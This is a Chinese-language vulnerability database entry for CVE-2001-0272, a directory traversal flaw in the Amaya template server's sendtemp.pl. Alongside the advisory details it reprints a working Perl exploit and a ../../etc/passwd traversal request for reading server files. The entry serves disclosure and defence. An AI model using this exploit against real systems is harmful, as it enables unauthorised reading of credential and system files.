CVE-2001-0272
CVSS5.0
发布时间 :2001-05-03 00:00:00
修订时间 :2008-09-05 16:23:42
NMCOE    

[原文]Directory traversal vulnerability in sendtemp.pl in W3.org Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter.


[CNNVD]W3C Amaya Templates Server sendtemp.pl远程目录遍历漏洞(CNNVD-200105-031)

        
        W3C的Amaya是一个所见即所得的Web浏览器和认证程序。它有一个叫做模板服务器的组件,可以从一个Apache Web服务器取得模板用在基于Amaya的认证。
        Amaya模板服务器的一个脚本程序sendtemp.pl实现上存在输入验证漏洞,远程攻击者可能利用此漏洞遍历服务器的目录,读取任意Apache服务进程有权限读取的文件。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0272
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0272
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-031
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-02/0259.html
(VENDOR_ADVISORY)  BUGTRAQ  20010212 W3.ORG sendtemp.pl

- 漏洞信息

W3C Amaya Templates Server sendtemp.pl远程目录遍历漏洞
中危 未知
2001-05-03 00:00:00 2005-10-20 00:00:00
远程  
        
        W3C的Amaya是一个所见即所得的Web浏览器和认证程序。它有一个叫做模板服务器的组件,可以从一个Apache Web服务器取得模板用在基于Amaya的认证。
        Amaya模板服务器的一个脚本程序sendtemp.pl实现上存在输入验证漏洞,远程攻击者可能利用此漏洞遍历服务器的目录,读取任意Apache服务进程有权限读取的文件。
        

- 公告与补丁

        厂商补丁:
        W3C
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.w3.org/Amaya/

- 漏洞信息 (289)

sendtemp.pl Read Access to Files (EDBID:289)
cgi webapps
2001-03-04 Verified
0 Tom Parker
N/A [点击下载]
#!/usr/bin/perl -w

# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the servers file system,  as whichever 
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, its just as easy 
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - tom@rooted.net
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
    MRX of HHP-Programming (www.hhp-programming.net)
	  -  Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;

}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }

# milw0rm.com [2001-03-04]
		

- 漏洞信息

510
W3.org Anaya Web sendtemp.pl templ Variable Traveral Arbitrary File Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-02-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站